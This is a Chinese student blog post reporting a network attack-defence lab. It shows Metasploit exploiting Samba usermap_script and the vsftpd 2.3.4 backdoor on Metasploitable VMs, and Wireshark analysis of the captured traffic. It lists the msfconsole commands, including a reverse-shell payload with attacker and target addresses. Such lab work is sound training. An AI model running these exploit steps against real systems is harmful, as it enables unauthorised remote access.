20232827 2023-2024-2 《网络攻防实践》实践七报告

已于 2024-04-27 09:44:34 修改
阅读量803 收藏 18
点赞数 22
文章标签: 网络 web安全 安全
于 2024-04-26 17:47:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52102143/article/details/138197024
版权

1.实践内容

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1使用Metasploit进行Linux远程渗透攻击
Kali作为攻击机,Meta作为靶机

虚拟机IP Address
kali192.168.200.5
meta192.168.200.123

使用Kali,在终端启动metasploit,如图所示:
在这里插入图片描述
然后输入 use exploit/multi/samba/usermap_script,使用usermap_script漏洞,随后输入 show payloads显示所有可用载荷。
在这里插入图片描述
通过使用命令 set payload 20,随后设置攻击参数
在这里插入图片描述
通过show options,查看详细信息
在这里插入图片描述
然后使用exploit开始攻击,成功。
在这里插入图片描述
在这里插入图片描述
2.2 实践作业:攻防对抗实践
2.2.1攻击实验

虚拟机IP
meta (Mary)192.168.239.35
kali (田)192.168.239.225

检验二者之间的连通性,可以ping通.
在这里插入图片描述
在这里插入图片描述

使用以下命令进行目标主机(靶机)的漏洞扫描

sudo nmap -sV -p 192.168.239.35

在这里插入图片描述
依次执行以下代码:

msfconsole
use exploit/multi/samba/usermap_script
show payloads
set payload cmd/unix/reverse
set LHOST 192.168.137.22
set RHOST 192.168.137.62
show options
exploit

通过 msfconsole,可以访问各种模块和工具,执行渗透测试任务,探索系统漏洞,以及执行各种网络攻击和漏洞利用
在这里插入图片描述
查看漏洞信息:
在这里插入图片描述

在这里插入图片描述
进行设置:

在这里插入图片描述
在这里插入图片描述

抓包:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.2.3防御实验
本次实验的成员及虚拟机信息如下:

虚拟机IP
kali (mary)192.168.239.160
meta (tian)192.168.239.140

首先进行连通性测试,可以相互ping通:
在这里插入图片描述
在这里插入图片描述
之后在kali上扫描靶机漏洞
在这里插入图片描述

输入search vsftpd查看漏洞信息
在这里插入图片描述

输入命令use exploit/unix/ftp/vsftpd_234_backdoor进入漏洞所在文件,输入show options查看攻击此漏洞需要的设置
在这里插入图片描述

通过使用 set payload/cmd/unix/interact命令设置此次攻击,然后,输入set LHOST 192.168.200.2 、set RHOST 192.168.200.124
设置进行攻击的主机为kali,受到攻击的主机为meta
在这里插入图片描述

输入run命令进行攻击,成功之后输入whoami查看权限,输入ifconfig查看靶机网络信息
在这里插入图片描述

在进行攻击时打开wireshark输入ip.addr192.168.239.140 and ip.addr192.168.239.160进行捕包,可以看出攻击机IP地址为192.168.239.160,靶机IP地址为192.168.239.140,攻击的端口为21
在这里插入图片描述

查看tcp流可以看到攻击机的命令和攻击时用到的漏洞信息
在这里插入图片描述
在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:第二个实验,漏洞可能有问题,打不通
  • 问题1解决方案:下载了新的虚拟机linux2.0
  • 问题2:改为桥接模式后IP地址不改变
  • 问题2解决方案:重启!

4.实践总结

耐心,多尝试。和上次实验有相似之处,可参考。

参考资料

  • https://www.cnblogs.com/wongyoho/p/12743218.html
  • https://blog.csdn.net/qq_53198713/article/details/138182025?spm=1001.2014.3001.5501
晴天霹雳
关注
  • 22
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
华中科技大学网络攻防实践相关
02-14
华中科技大学网络攻防实践相关
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
网络攻防技术实践-防火墙.doc
05-12
网络安全实验
网络攻防技术实践-NIDS.doc
05-12
网络安全技术实验
2021实战攻防企业红蓝对抗实践指南-长亭
08-06
2021实战攻防企业红蓝对抗实践指南-长亭
网络安全实训Day16
Yisitelz的博客
04-26 2344
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
2024 怎么从一个小白到一名黑客,自学笔记
最新发布
2401_84466225的博客
05-08 961
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
深入理解网络原理2----UDP协议
m0_74299308的博客
05-04 543
随着时代的发展,越来越需要计算机之间互相通信,共享软件和数据,即以多个计算机协同⼯作来完成业务,就有了⽹络互连。
题目 1452: 网络寻路
weixin_64443786的博客
05-01 243
蓝桥杯
网络原理 1】 网络编程原理基础知识
Y_1215的博客
05-06 713
这里会详细介绍IP地址、端口号、协议、协议分层、封装、分用、客户端、服务器、请求、响应、两台主机之间的网络通信流程 网络原理知识IP地址(Internet Protocol Address):它是分配给设备以在网络上识别和通信的唯一标识符。IPv4地址由32位二进制数表示,通常以点分十进制表示,如192.168.1.1。IPv6地址则由128位二进制数表示,通常以八组十六进制数表示。端口号(Port Number):在网络通信中,端口号用于标识特定的应用程序或服务。
某塑料科技公司网络与机房监控运维项目
zhtelecom的博客
05-06 629
通过部署智和信通综合监控运维方案实时监控用户网络与机房内大量异构的交换机、路由器、服务器、AC/AP、数据库、防火墙、虚拟机、语音网关、硬盘录像机、行为管理等设备,及时发现并预警潜在问题,从而避免或减少故障带来的负面影响。
kubectl_进阶_网络
lisus2007的专栏
05-08 416
kubectl_进阶_网络
软考网络规划师复习第二章:认识企业设备
衡水铁头哥的博客
05-06 760
正文共:5120 字 53 图,预估阅读时间:7 分钟网络之路第一章:Windows系统中的网络0、序言 1、Windows系统中的网络 1.1、桌面中的网卡 1.2、命令行中的网卡 1.3、路由表 1.4、家用路由器2、认识企业设备当我们对普通的设备功能有了一定的概念之后,我们就可以向高端设备发起冲击了!认识企业级设备的方式主要有接触真机和凭空想象等,对于一般的初学者、学生和网络爱好者等...
网络安全>《74 微课堂<容器是什么?>》
Else 的博客
05-05 472
容器,是一种虚拟化技术。允许一个操作系统上用户空间被分割成几个独立的单元在内核中运行,彼此互不干扰,这样一个独立的空间,就被称之为一个容器。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-03 749
在分析网络数据源的过程中,面对大量的数据,我学会了如何筛选和识别关键信息,通过对数据包的深入分析,我能够理解攻击者的策略和行为模式。在筛选后的数据包中发现只有NBNS包,NBNS是网络基本输入/输出系统(NetBIOS)的一部分,主要负责在基于NetBIOS名称访问的网络上提供主机名和地址映射服务。如上图所示,前面的字符串都是一些乱码,而最后出现了两个dll文件和三个没有文件名后缀的文件,根据这三个文件的文件名,猜测是程序或函数。在筛选后的数据包中只有一些TCP三次握手过程的数据包,没有数据的交互。
Filter-Policy原理和应用
更多内容查看博客描述。
05-04 1518
filter-policy也是一个很常用的路由信息过滤工具,如图10-7所示,SwitchA、SwitchB、SwitchC之间运行某种路由协议,路由在各个设备之间传递,当需要根据实际需求过滤某些路由信息的时候可以使用filter-policy实现。图10-7 filter-policy的应用场景说明:filter-policy只能过滤路由信息,无法过滤LSA,不能修改路由属性值。
ASV1000视频监控平台:通过SDK接入海康网络摄像机IPC
weixin_70208651的博客
05-03 759
SDK通常还提供了丰富的自定义设置接口,允许开发者根据具体需求对网络摄像机进行配置。例如,开发者可以设置摄像机的分辨率、帧率、码率等参数,以满足不同的应用场景需求。以及视频采集和显示、音视频编码、音视频解码、视频存储、视频回放、报警事件处理、PTZ控制、自定义设置、扩展功能(音频采集和传输、图像预处理、人脸识别等);视频监控平台通过SDK接入海康网络摄像机可以获得更高的定制化和灵活性、更高的处理速度和效率、更好的兼容性、更丰富的功能接口、更高的安全性以及更好的技术支持和服务。
网络初识)
weixin_73775528的博客
05-06 746
协议分层类似于打电话时,
webrtc初步了解
君莫笑lucky的博客
05-06 569
WebRTC搭建点对点实时音视频对话,起始需要保证完成两点:1.,了解彼此支持的媒体格式。参与视频通讯的双方必须先交换SDP信息,交换SDP的过程。2.,了解彼此的网络环境,找到一条相互通讯的链路。(1)获取外网IP地址映射;(2)通过信令服务器交换“网络信息”网络术语:媒体协商 sdp 了解彼此的编解码能力(支持的媒体格式)网络协商 candidate 了解彼此的外网端口映射实际网络环境中,双方都在。需要利用来解决该问题。
2021实战攻防企业红蓝对抗实践指南-长亭.pdf
07-17
《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份关于红蓝对抗实践的指南文件。红蓝对抗是一种模拟真实攻击和防御的方法,旨在测试企业的安全性能和发现潜在漏洞。 该指南首先介绍了红蓝对抗实践的基本概念和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值